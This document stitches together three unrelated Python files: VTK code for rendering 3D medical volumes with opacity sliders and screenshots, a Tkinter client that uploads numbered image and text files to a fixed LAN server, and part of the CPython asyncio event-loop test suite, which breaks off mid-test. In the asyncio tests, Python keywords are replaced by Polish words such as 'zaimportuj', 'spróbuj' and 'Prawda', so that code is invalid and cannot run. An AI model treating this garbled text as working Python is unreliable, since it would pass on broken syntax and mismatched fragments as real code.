volumeProperty_seg.SetGradientOpacity(gradtfun_seg)
volumeProperty_seg.SetInterpolationTypeToLinear() # ???
volumeProperty_seg.ShadeOn()
volumeProperty_segs.append(volumeProperty_seg)
render_volume_seg = vtk.vtkVolume() # 演员
render_volume_seg.SetMapper(volumeMapper_seg)
render_volume_seg.SetProperty(volumeProperty_seg)
render.AddActor(outlineActor)
render.AddVolume(render_volume_seg)
render.ResetCamera()
sliderRep_min = vtk.vtkSliderRepresentation2D()
sliderRep_min.SetMinimumValue(0)
sliderRep_min.SetMaximumValue(10)
sliderRep_min.SetValue(1)
sliderRep_min.SetTitleText("minValue")
sliderRep_min.SetSliderLength(0.025)
sliderRep_min.SetSliderWidth(0.05)
sliderRep_min.SetEndCapLength(0.005)
sliderRep_min.SetEndCapWidth(0.025)
sliderRep_min.SetTubeWidth(0.0125)
sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint1Coordinate().SetValue(0.15 / 1, 0.1)
sliderRep_min.GetPoint2Coordinate().SetValue(0.45 / 1, 0.1)
sliderWidget_min = vtk.vtkSliderWidget()
sliderWidget_min.SetInteractor(renWinInteractor)
sliderWidget_min.SetRepresentation(sliderRep_min)
sliderWidget_min.SetCurrentRenderer(render)
sliderWidget_min.SetAnimationModeToAnimate()
sliderRep_max = vtk.vtkSliderRepresentation2D()
sliderRep_max.SetMinimumValue(0)
sliderRep_max.SetMaximumValue(10)
sliderRep_max.SetValue(9)
sliderRep_max.SetTitleText("maxValue")
sliderRep_max.SetSliderLength(0.025)
sliderRep_max.SetSliderWidth(0.05)
sliderRep_max.SetEndCapLength(0.005)
sliderRep_max.SetEndCapWidth(0.025)
sliderRep_max.SetTubeWidth(0.0125)
sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint1Coordinate().SetValue(0.55 / 1, 0.1)
sliderRep_max.GetPoint2Coordinate().SetValue(0.85 / 1, 0.1)
sliderWidget_max = vtk.vtkSliderWidget()
sliderWidget_max.SetInteractor(renWinInteractor)
sliderWidget_max.SetRepresentation(sliderRep_max)
sliderWidget_max.SetCurrentRenderer(render)
sliderWidget_max.SetAnimationModeToAnimate()
def update_minmax(obj, ev):
# print(obj)
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
# reset value
if minValue >= maxValue:
if obj == sliderWidget_max:
sliderWidget_max.GetRepresentation().SetValue(max(maxValue, minValue + 0.01))
elif obj == sliderWidget_min:
sliderWidget_min.GetRepresentation().SetValue(min(maxValue - 0.01, minValue))
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
tcfun_src.RemoveAllPoints()
tcfun_src.AddPoint(minValue, 0.0)
tcfun_src.AddPoint(maxValue, 1.0)
volumeProperty_src.SetScalarOpacity(tcfun_src)
# print(minValue, maxValue)
sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_min.EnabledOn()
sliderWidget_max.EnabledOn()
# 键盘控制交互式操作
class KeyPressInteractorStyle(vtk.vtkInteractorStyleTrackballCamera):
def __init__(self, parent=None, *args, **kwargs):
super(KeyPressInteractorStyle).__init__(*args, **kwargs)
self.parent = vtk.vtkRenderWindowInteractor()
if parent is not None:
self.parent = parent
self.AddObserver("KeyPressEvent", self.keyPress)
def keyPress(self, obj, event):
key = self.parent.GetKeySym()
if key.upper() == 'X':
opacity = tcfun_seg.GetValue(0)
if opacity:
print('Hide Label')
tcfun_seg.RemoveAllPoints()
tcfun_seg.AddPoint(minValue, 0.0)
tcfun_seg.AddPoint(maxValue, 0.0)
for volumeProperty_seg in volumeProperty_segs:
volumeProperty_seg.SetScalarOpacity(tcfun_seg)
renWin.Render()
else:
print('Show Label')
tcfun_seg.RemoveAllPoints()
tcfun_seg.AddPoint(minValue + 1, 0.2)
tcfun_seg.AddPoint(maxValue, 0.2)
for volumeProperty_seg in volumeProperty_segs:
volumeProperty_seg.SetScalarOpacity(tcfun_seg)
renWin.Render()
if key == 'Down':
# print('Down')
# tfun.RemoveAllPoints()
# tfun.AddPoint(1129, 0)
renWin.Render()
renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(parent=renWinInteractor)) # 在交互操作里面添加这个自定义的操作例如up,down
return render, sliderWidget_min, sliderWidget_max
# return render, None, None
def vtkShowTogether(numpyImage_src, numpyImage_segs, spacing=(1.0, 1.0, 1.0)):
assert isinstance(numpyImage_src, np.ndarray)
if isinstance(numpyImage_segs, np.ndarray):
numpyImage_segs = [numpyImage_segs]
assert isinstance(numpyImage_segs, (list, tuple)), "numpyImage_segs must be one of list or tuple"
num_seg = len(numpyImage_segs)
assert 0 <= num_seg <= 4
spacing = tuple(reversed(spacing))
renWin = vtk.vtkRenderWindow()
renWinInteractor = vtk.vtkRenderWindowInteractor()
renWinInteractor.SetRenderWindow(renWin) # 把上面那个窗口加入交互操作
renWin.SetSize(300, 300)
# print(col, row)
camera = vtk.vtkCamera()
print('shape of data', numpyImage_src.shape)
pos = (0, 0, 1.0, 1.0)
render, sliderWidget_min, sliderWidget_max = getRenderSrcWithSeg(camera, renWinInteractor, renWin,
numpyImage_src, numpyImage_segs, spacing,
pos=pos)
# render, sliderWidget_min, sliderWidget_max = getRenderOfSrcImage(1,
# camera, renWinInteractor,
# numpyImage_src, spacing,
# pos=pos)
renWin.AddRenderer(render)
# renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(parent=renWinInteractor)) # 在交互操作里面添加这个自定义的操作例如up,down
# renWinInteractor.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera()) # 在交互操作里面添加这个自定义的操作例如up,down
renWin.Render()
renWinInteractor.Start()
def vtkShowMulti(numpyImage_srcs, numpyImage_segs, spacing=(1.0, 1.0, 1.0)):
if isinstance(numpyImage_srcs, np.ndarray):
numpyImage_srcs = [numpyImage_srcs]
if isinstance(numpyImage_segs, np.ndarray):
numpyImage_segs = [numpyImage_segs]
assert isinstance(numpyImage_srcs, (list, tuple)), "numpyImage_srcs must be one of list or tuple"
assert isinstance(numpyImage_segs, (list, tuple)), "numpyImage_segs must be one of list or tuple"
num_src = len(numpyImage_srcs)
num_seg = len(numpyImage_segs)
assert 0 <= num_src <= 4 and 0 <= num_seg <= 4
spacing = tuple(reversed(spacing))
# 键盘控制交互式操作
class KeyPressInteractorStyle(vtk.vtkInteractorStyleTrackballCamera):
def __init__(self, parent=None, *args, **kwargs):
super(KeyPressInteractorStyle).__init__(*args, **kwargs)
self.parent = vtk.vtkRenderWindowInteractor()
if parent is not None:
self.parent = parent
self.AddObserver("KeyPressEvent", self.keyPress)
def keyPress(self, obj, event):
key = self.parent.GetKeySym()
if key == 'Up':
# gradtfun.AddPoint(-100, 1.0)
# gradtfun.AddPoint(10, 1.0)
# gradtfun.AddPoint(20, 1.0)
#
# volumeProperty.SetGradientOpacity(gradtfun)
renWin.Render()
if key == 'Down':
# print('Down')
# tfun.RemoveAllPoints()
# tfun.AddPoint(1129, 0)
renWin.Render()
camera = vtk.vtkCamera()
renWin = vtk.vtkRenderWindow()
renWinInteractor = vtk.vtkRenderWindowInteractor()
renWinInteractor.SetRenderWindow(renWin) # 把上面那个窗口加入交互操作
col = max(num_seg, num_src)
row = int(num_seg > 0) + int(num_src > 0)
renWin.SetSize(300 * col, 300 * row)
# print(col, row)
for i, numpyImage_src in enumerate(numpyImage_srcs):
pos = [i / col, 1 - 1 / row, (i + 1) / col, 1]
print('shape of data No.', i, numpyImage_src.shape, pos)
render, sliderWidget_min, sliderWidget_max = getRenderOfSrcImage(col,
camera, renWinInteractor,
numpyImage_src, spacing,
pos=pos)
renWin.AddRenderer(render)
for i, numpyImage_seg in enumerate(numpyImage_segs):
pos = [i / col, 0, (i + 1) / col, 1 / row]
print('shape of data No.', i, numpyImage_seg.shape, pos)
render = getRenderOfSegImage(col,
camera, renWinInteractor,
numpyImage_seg, spacing,
pos=pos)
renWin.AddRenderer(render)
# renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(parent=renWinInteractor)) # 在交互操作里面添加这个自定义的操作例如up,down
renWinInteractor.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera()) # 在交互操作里面添加这个自定义的操作例如up,down
renWin.Render()
renWinInteractor.Start()
def vtkShowNotebook(numpyImage, spacing=(1.0, 1.0, 1.0)):
print('Running vtkShow ...')
from importlib import import_module
import tempfile
import sys
import shutil
#
# with tempfile.TemporaryDirectory() as temp_config_dir:
# print(temp_config_dir)
# temp_config_file = tempfile.NamedTemporaryFile(
# dir=temp_config_dir, suffix='.py', delete=False)
# temp_config_name = os.path.basename(temp_config_file.name)
# shutil.copyfile(os.path.dirname(__file__) + '/tmp_func.py', os.path.join(temp_config_dir, temp_config_name))
# temp_module_name = os.path.splitext(temp_config_name)[0]
# sys.path.insert(0, temp_config_dir)
# pickle.dump({'data': numpyImage, 'spacing': spacing}, open(temp_config_dir + '/tmp.pkl', 'wb'))
# mod = import_module(temp_module_name)
# del sys.modules[temp_module_name]
# # close temp file
# temp_config_file.close()
# pool = multiprocessing.Pool(1)
# pool.apply(func=_vtkShow, args=(numpyImage, spacing,))
# pool.close()
# pool.join()
if os.path.exists(os.path.dirname(__file__) + '/tmp.pkl'):
os.remove(os.path.dirname(__file__) + '/tmp.pkl')
pickle.dump({'data': numpyImage, 'spacing': spacing}, open(os.path.dirname(__file__) + '/tmp.pkl', 'wb'))
print(os.path.dirname(__file__))
cmd = f'{sys.executable} \"{os.path.dirname(__file__)}/tmp_func.py\" 1'
print(cmd)
os.system(cmd)
print('closing')
def vtkShow(numpyImage, spacing=(1.0, 1.0, 1.0)):
assert isinstance(numpyImage, np.ndarray), "numpyImage_srcs must be one of list or tuple"
spacing = tuple(reversed(spacing))
camera = vtk.vtkCamera()
renWin = vtk.vtkRenderWindow()
renWinInteractor = vtk.vtkRenderWindowInteractor()
renWinInteractor.SetRenderWindow(renWin) # 把上面那个窗口加入交互操作
renWin.SetSize(450, 300)
pos = [0, 0, 1, 1]
print('shape of data ', numpyImage.shape, pos, spacing)
render, sliderWidget_min, sliderWidget_max = getRenderOfSrcImage(1,
camera, renWinInteractor,
numpyImage, spacing,
pos=pos)
renWin.AddRenderer(render)
# renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(parent=renWinInteractor)) # 在交互操作里面添加这个自定义的操作例如up,down
renWinInteractor.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera()) # 在交互操作里面添加这个自定义的操作例如up,down
renWin.Render()
renWinInteractor.Start()
print('Closing')
renWin.Finalize()
renWinInteractor.TerminateApp()
# renWin.Render()
# renWin.Finalize()
# renWinInteractor.TerminateApp()
# renWin.End() # will cause Notebook restart
# del renWin, renWinInteractor
return
def vtkScreenshot(filename, numpyImage, spacing=(1.0, 1.0, 1.0)):
p = multiprocessing.Process(target=_vtkScreenshot, args=(filename, numpyImage, spacing,))
p.start()
# if os.path.exists(filename):
# p.terminate() # sends a SIGTERM
def _vtkScreenshot(filename, numpyImage, spacing=(1.0, 1.0, 1.0)):
assert isinstance(numpyImage, np.ndarray), "numpyImage_srcs must be one of list or tuple"
d, h, w = numpyImage.shape
spacing = tuple(reversed(spacing))
camera = vtk.vtkCamera()
camera.SetPosition(2 * d, 2 * h, 2 * w)
renWin = vtk.vtkRenderWindow()
renWin.SetSize(1024, 1024)
renWin.SetOffScreenRendering(1)
renWinInteractor = vtk.vtkRenderWindowInteractor()
renWinInteractor.SetRenderWindow(renWin) # 把上面那个窗口加入交互操作
pos = [0, 0, 1, 1]
print('shape of data ', numpyImage.shape, pos, spacing)
render, sliderWidget_min, sliderWidget_max = getRenderOfSrcImage(1,
camera, renWinInteractor,
numpyImage, spacing,
pos=pos)
renWin.Render()
renWinInteractor.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera()) # 在交互操作里面添加这个自定义的操作例如up,down
renWin.AddRenderer(render)
renWin.Render()
# renWinInteractor.Start()
# Screenshot
windowToImageFilter = vtk.vtkWindowToImageFilter()
windowToImageFilter.SetInput(renWin)
# windowToImageFilter.Set # set the resolution of the output image (3 times the current resolution of vtk render window)
windowToImageFilter.SetInputBufferTypeToRGBA() # also record the alpha (transparency) channel
windowToImageFilter.ReadFrontBufferOff() # read from the back buffer
windowToImageFilter.Update()
writer = vtk.vtkPNGWriter()
writer.SetFileName(filename)
writer.SetInputConnection(windowToImageFilter.GetOutputPort())
writer.Write()
# renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(parent=renWinInteractor)) # 在交互操作里面添加这个自定义的操作例如up,down
# renWin.Render()
# renWinInteractor.Start()
# renWin.Finalize()
# renWinInteractor.GetRenderWindow().Finalize()
# renWinInteractor.TerminateApp()
# del renWin, renWinInteractor
"""
https://www.programcreek.com/python/?code=adityadua24%2Frobopy%2Frobopy-master%2Frobopy%2Fbase%2Fgraphics.py
"""
|
constructor.py
|
import Tkinter as tk
import ttk
import socket
import os
from time import sleep
import threading
n_files = 0
counter = 0
path = "work_directory" + "/"
prbar_flag = True
def progress():
while prbar_flag:
prbar['value'] = counter
if prbar["value"] >= prbar["maximum"]:
break
return
def check_fool(outlist):
for one in outlist:
if not one.isdigit():
err = "name dir is wrong: '" + one + "'"
return 0, err
inlist = os.listdir(path + one)
for f in inlist:
global n_files
n_files += 1
partF = f.split(".")
if (partF[1] != "jpg") and (partF[1] != "png") and (partF[1] != "txt"):
err = "Wrong format of file: '" + f + "'"
return 0, err
if not partF[0].isdigit():
err = "file name is wrong: '" + f + "'"
return 0, err
return 1, "OK"
def sendFile(s, f, form):
if form != -1:
s.send(form)
if f != -1:
for line in f:
k1 = chr(len(line) >> 8)
k2 = chr(len(line) - (ord(k1) << 8))
s.send(k1)
s.send(k2)
s.send(line)
s.send(chr(0))
s.send(chr(5))
s.send(";;;;;")
return
def sendVar(n):
s = socket.socket()
s.connect(("192.168.43.110",9999))
global counter
prbar["maximum"] = n_files
s.send("1 0")
s.send(chr(len(n)))
for i in range(1, len(n) + 1):
for j in range(1, 5):
zt = path + str(i) + "/" + str(j) + ".txt"
zp = path + str(i) + "/" + str(j) + ".jpg"
try:
f1 = open (zt, "rb")
except IOError:
sendFile(s, -1, -1) # send empty txt file
counter += 1
else:
sendFile(s, f1, -1) # send not empty txt file
f1.close()
counter += 1
if j == 1:
try:
f2 = open (zp, "rb")
except IOError:
try:
zp = path + str(i) + "/" + str(j) + ".png"
f2 = open (zp, "rb")
except IOError:
sendFile(s, -1, "J") # send empty jpg file
counter += 1
else:
sendFile(s, f2, "P") # send not empty png file
f2.close()
counter += 1
else:
sendFile(s, f2, "J")
f2.close()
counter += 1
else:
try:
f2 = open (zp, "rb")
except IOError:
try:
zp = path + str(i) + "/" + str(j) + ".png"
f2 = open(zp, "rb")
except IOError:
sendFile(s, -1, "J")
counter += 1
else:
sendFile(s, f2, "P")
f2.close()
counter += 1
else:
sendFile(s, f2, "J")
f2.close()
counter += 1
k = s.recv(1)
lvars = s.recv(ord(k))
lblvars['text'] = lvars
s.close()
btn1["state"] = tk.NORMAL
btn2["state"] = tk.NORMAL
return
def fake_sendVar():
btn1["state"] = tk.DISABLED
btn2["state"] = tk.DISABLED
n = os.listdir(path)
flag = 0
code, err = check_fool(n)
if not len(n) or not code:
if err == "OK":
err = "work_directory is empty"
flag += 1
errform = tk.Toplevel(root)
errform.resizable(0, 0)
errform.geometry("400x90")
errform.transient(root)
errlbl = tk.Label(errform, text="Error:" + err + "\nPlease, complete all instructions", font="7")
errbtn = tk.Button(errform, text="Ok!", width=5, height=1, command=errform.destroy)
errlbl.place(x=10, y=20)
errbtn.place(x=15, y=60)
if flag:
btn1["state"] = tk.NORMAL
btn2["state"] = tk.NORMAL
return
threading.Thread(target=lambda:sendVar(n)).start()
threading.Thread(target=progress).start()
return
def exitAll():
global prbar_flag
prbar_flag = False
root.destroy()
return
root = tk.Tk()
#root.iconbitmap(os.getcwd() + "/icon.ico")
root.geometry('400x180')
root.title("Audream constructor v0.1")
#root.protocol('WM_DELETE_WINDOW')
btn1 = tk.Button(root, text="Send variant", width=15, height=3, command=fake_sendVar)
btn1.place(x=130, y=100)
btn2 = tk.Button(root, text="Exit", width=5, height=1, command=exitAll)
btn2.place(x=320, y=15)
lbl1 = tk.Label(root, text="Your numbers are:")
lbl1.place(x=10, y=10)
prbar = ttk.Progressbar(root, orient="horizontal", length=200, mode="determinate")
prbar.pack(side="bottom")
lblvars = tk.Label(root, font="Monospace 15")
lblvars.place(x=150, y=50)
root.mainloop()
|
test_base_events.py
|
"""Tests dla base_events.py"""
zaimportuj errno
zaimportuj logging
zaimportuj math
zaimportuj socket
zaimportuj sys
zaimportuj threading
zaimportuj time
zaimportuj unittest
z unittest zaimportuj mock
zaimportuj asyncio
z asyncio zaimportuj base_events
z asyncio zaimportuj constants
z asyncio zaimportuj test_utils
spróbuj:
z test zaimportuj support
wyjąwszy ImportError:
z asyncio zaimportuj test_support jako support
spróbuj:
z test.support.script_helper zaimportuj assert_python_ok
wyjąwszy ImportError:
spróbuj:
z test.script_helper zaimportuj assert_python_ok
wyjąwszy ImportError:
z asyncio.test_support zaimportuj assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
klasa BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
przy self.assertRaises(NotImplementedError):
gen.send(Nic)
def test_close(self):
self.assertNieprawda(self.loop.is_closed())
self.loop.close()
self.assertPrawda(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop jest closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: Nieprawda, (), self.loop)
self.loop._add_callback(h)
self.assertNieprawda(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: Nieprawda, (), self.loop)
h.cancel()
self.loop._add_callback(h)
self.assertNieprawda(self.loop._scheduled)
self.assertNieprawda(self.loop._ready)
def test_set_default_executor(self):
executor = mock.Mock()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_getnameinfo(self):
sockaddr = mock.Mock()
self.loop.run_in_executor = mock.Mock()
self.loop.getnameinfo(sockaddr)
self.assertEqual(
(Nic, socket.getnameinfo, sockaddr, 0),
self.loop.run_in_executor.call_args[0])
def test_call_soon(self):
def cb():
dalej
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_later(self):
def cb():
dalej
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
dalej
loop.set_debug(debug)
jeżeli debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
przy self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
przy self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
przy self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
inaczej:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop jest running
event.wait()
spróbuj:
jeżeli create_loop:
loop2 = base_events.BaseEventLoop()
spróbuj:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
w_końcu:
asyncio.set_event_loop(Nic)
loop2.close()
inaczej:
self.check_thread(loop, debug)
wyjąwszy Exception jako exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
inaczej:
loop.call_soon_threadsafe(fut.set_result, Nic)
def test_thread(loop, debug, create_loop=Nieprawda):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# podnieś RuntimeError jeżeli the thread has no event loop
test_thread(self.loop, Prawda)
# check disabled jeżeli debug mode jest disabled
test_thread(self.loop, Nieprawda)
# podnieś RuntimeError jeżeli the event loop of the thread jest nie the called
# event loop
test_thread(self.loop, Prawda, create_loop=Prawda)
# check disabled jeżeli debug mode jest disabled
test_thread(self.loop, Nieprawda, create_loop=Prawda)
def test_run_once_in_executor_handle(self):
def cb():
dalej
self.assertRaises(
AssertionError, self.loop.run_in_executor,
Nic, asyncio.Handle(cb, (), self.loop), ('',))
self.assertRaises(
AssertionError, self.loop.run_in_executor,
Nic, asyncio.TimerHandle(10, cb, (), self.loop))
def test_run_once_in_executor_cancelled(self):
def cb():
dalej
h = asyncio.Handle(cb, (), self.loop)
h.cancel()
f = self.loop.run_in_executor(Nic, h)
self.assertIsInstance(f, asyncio.Future)
self.assertPrawda(f.done())
self.assertIsNic(f.result())
def test_run_once_in_executor_plain(self):
def cb():
dalej
h = asyncio.Handle(cb, (), self.loop)
f = asyncio.Future(loop=self.loop)
executor = mock.Mock()
executor.submit.return_value = f
self.loop.set_default_executor(executor)
res = self.loop.run_in_executor(Nic, h)
self.assertIs(f, res)
executor = mock.Mock()
executor.submit.return_value = f
res = self.loop.run_in_executor(executor, h)
self.assertIs(f, res)
self.assertPrawda(executor.submit.called)
f.cancel() # Don't complain about abandoned Future.
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: Prawda, (),
self.loop)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: Prawda, (),
self.loop)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertPrawda(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertPrawda(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(Prawda)
self.assertPrawda(self.loop.get_debug())
self.loop.set_debug(Nieprawda)
self.assertNieprawda(self.loop.get_debug())
@mock.patch('asyncio.base_events.logger')
def test__run_once_logging(self, m_logger):
def slow_select(timeout):
# Sleep a bit longer than a second to avoid timer resolution
# issues.
time.sleep(1.1)
zwróć []
# logging needs debug flag
self.loop.set_debug(Prawda)
# Log to INFO level jeżeli timeout > 1.0 sec.
self.loop._selector.select = slow_select
self.loop._process_events = mock.Mock()
self.loop._run_once()
self.assertEqual(logging.INFO, m_logger.log.call_args[0][0])
def fast_select(timeout):
time.sleep(0.001)
zwróć []
self.loop._selector.select = fast_select
self.loop._run_once()
self.assertEqual(logging.DEBUG, m_logger.log.call_args[0][0])
def test__run_once_schedule_handle(self):
handle = Nic
processed = Nieprawda
def cb(loop):
nonlocal processed, handle
processed = Prawda
handle = loop.call_soon(lambda: Prawda)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertPrawda(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertPrawda(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
dalej
# Set up one "blocking" event that will nie be cancelled to
# ensure later cancelled events do nie make it to the head
# of the queue oraz get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
dla x w range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head oraz removed
cancelled_count += 2
dla x w range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test jest invalid jeżeli _MIN_SCHEDULED_TIMER_HANDLES jest too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to dalej _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will nie be cancelled
not_cancelled_count += add_not_cancel_count
dla x w range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
dla x w range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertPrawda(all([not x._cancelled dla x w self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = asyncio.Future(loop=self.loop)
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, nie a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, nie int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must nie be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=Prawda)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=Prawda)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, nie an int albo a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must nie be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=Prawda)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=Prawda)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(Prawda)
1/0
# Test call_soon (events.Handle)
przy mock.patch('asyncio.base_events.logger') jako log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception w callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
przy mock.patch('asyncio.base_events.logger') jako log:
